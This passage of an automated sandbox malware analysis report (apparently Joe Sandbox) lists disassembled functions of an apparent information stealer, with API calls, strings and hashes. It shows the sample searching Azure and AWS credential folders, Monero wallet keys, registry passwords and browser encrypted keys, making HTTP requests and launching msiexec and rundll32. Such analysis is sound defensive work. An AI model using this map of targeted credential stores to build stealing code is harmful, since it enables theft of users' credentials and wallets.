                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                                • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                                • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001D4EE5
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49B0
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E08D2), ref: 001D49C5
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49E2
                                • Part of subcall function 001D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 001D4A1E
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,014AE968), ref: 001D4A4A
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FF8), ref: 001D4A5C
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A70
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FFC), ref: 001D4A82
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A96
                                • Part of subcall function 001D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 001D4AAC
                                • Part of subcall function 001D4910: DeleteFileA.KERNEL32(?), ref: 001D4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: c7aacc4a82886b55d9036378e10a9f378d406d1c2517f366ebc166aa60ca8f14
                              • Instruction ID: 5a252cf23816ec3cfb9bc735fb76d9f1138b38bf0b6e7a284e60b5615d067eb3
                              • Opcode Fuzzy Hash: c7aacc4a82886b55d9036378e10a9f378d406d1c2517f366ebc166aa60ca8f14
                              • Instruction Fuzzy Hash: 9841C2BA94025867DB10F760EC47FED3338AB75700F404494B589661C2EFB49BC98B92
                              Function 001D9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001D906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                              • Instruction ID: 254b9fa1824602b73afabc77f72379dbb87b8c8e613d3a5df276e79038bd2b9e
                              • Opcode Fuzzy Hash: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                              • Instruction Fuzzy Hash: 9471F9B5A10208ABDB04EFE4DD89FEEB7B8BF58300F108518F516A7290DB34E905CB65
                              Function 001D2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                              • Instruction ID: a0018f5e7bf88ff4f94305a5ad43e1d39999ed3e620f65d2a5fd6b52a34daad8
                              • Opcode Fuzzy Hash: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                              • Instruction Fuzzy Hash: 831246718001589ADB09FBA0DCA2FDEB738AF34300F90416AF50676291EF742B4ACF56
                              Function 001D52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                                • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6303
                                • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                                • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C6385
                                • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                                • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                              • lstrlen.KERNEL32(00000000), ref: 001D532F
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                              • lstrlen.KERNEL32(00000000), ref: 001D5383
                              • lstrlen.KERNEL32(00000000), ref: 001D53AE
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                              • Instruction ID: d0b6ce5beaa45ba40e8219f8886eaf0dec2d32dd74162bcce9619a732fac870b
                              • Opcode Fuzzy Hash: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                              • Instruction Fuzzy Hash: 74514430950148EBCB18FF64CD96EED7779AF20301F904019F8066B292EF34AB45DBA6
                              Function 001D12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 80d1a05566361c89047abe2bb6585e57e0f8f7b0dc8e93e2f9d9bd95966cd371
                              • Instruction ID: fc94b174f8036c002ae066ccf4e27a203a41b1fa0bf6722ded3818d1506b79e9
                              • Opcode Fuzzy Hash: 80d1a05566361c89047abe2bb6585e57e0f8f7b0dc8e93e2f9d9bd95966cd371
                              • Instruction Fuzzy Hash: EFC1B7B5940219ABCB14EF60DD89FEE7378BF64304F004599F50A67381EB70AA85CF95
                              Function 001D4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D42EC
                              • lstrcat.KERNEL32(?,014AE5D8), ref: 001D430B
                              • lstrcat.KERNEL32(?,?), ref: 001D431F
                              • lstrcat.KERNEL32(?,014AD230), ref: 001D4333
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                                • Part of subcall function 001C9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D93C0: GlobalAlloc.KERNEL32(00000000,001D43DD,001D43DD), ref: 001D93D3
                              • StrStrA.SHLWAPI(?,014AE590), ref: 001D43F3
                              • GlobalFree.KERNEL32(?), ref: 001D4512
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                                • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                                • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001D44A3
                              • StrCmpCA.SHLWAPI(?,001E08D1), ref: 001D44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001D44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001D44E5
                              • lstrcat.KERNEL32(00000000,001E0FB8), ref: 001D44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: cbf101e6daebb3bc9d94b6f76cf04ffee67905c297c6e44d6785011986c4aead
                              • Instruction ID: 69fda7a01610cc7d3d1a7e2854bc4da5a0b740ac7491de670ab64febed19215f
                              • Opcode Fuzzy Hash: cbf101e6daebb3bc9d94b6f76cf04ffee67905c297c6e44d6785011986c4aead
                              • Instruction Fuzzy Hash: A67166B6900218ABCB14FBA0DC99FEE7379AF98300F008599F605A7181EB75DB55CF91
                              Function 001C1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                                • Part of subcall function 001C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                                • Part of subcall function 001C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                                • Part of subcall function 001C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                                • Part of subcall function 001C12A0: RegCloseKey.ADVAPI32(?), ref: 001C12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 001C134F
                              • lstrlen.KERNEL32(?), ref: 001C135C
                              • lstrcat.KERNEL32(?,.keys), ref: 001C1377
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 001C1465
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001C14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: a14e0a8f51945a971e257e139ae7fa32529e20187fc313abd9d600fb71b4ca36
                              • Instruction ID: 411e7ca597266069fa0d17c0f282e4bce637fcfeb4e30910c2de51d4711bd8c4
                              • Opcode Fuzzy Hash: a14e0a8f51945a971e257e139ae7fa32529e20187fc313abd9d600fb71b4ca36
                              • Instruction Fuzzy Hash: FA5146B1D5015957CB15FB60DD92FED737CAF64300F8041A9B60A62182EF706B89CFA6
                              Function 001C75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001C72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                                • Part of subcall function 001C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                                • Part of subcall function 001C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                                • Part of subcall function 001C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                                • Part of subcall function 001C72D0: HeapFree.KERNEL32(00000000), ref: 001C7459
                              • lstrcat.KERNEL32(00000000,001E17FC), ref: 001C7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 001C765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C768F
                              • lstrcat.KERNEL32(00000000,001E1804), ref: 001C76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C76D3
                              • lstrcat.KERNEL32(00000000,001E1808), ref: 001C76ED
                              • task.LIBCPMTD ref: 001C76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                              • Instruction ID: 8e2cea0fe2f44280483a916a627d2a918bc0b9fa1eded31960ce1b7a6471ee4b
                              • Opcode Fuzzy Hash: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                              • Instruction Fuzzy Hash: 87316E72900209EFCB08EBB5DD85EFE73B8BB64301B144528F102B7290DB34E956CB55
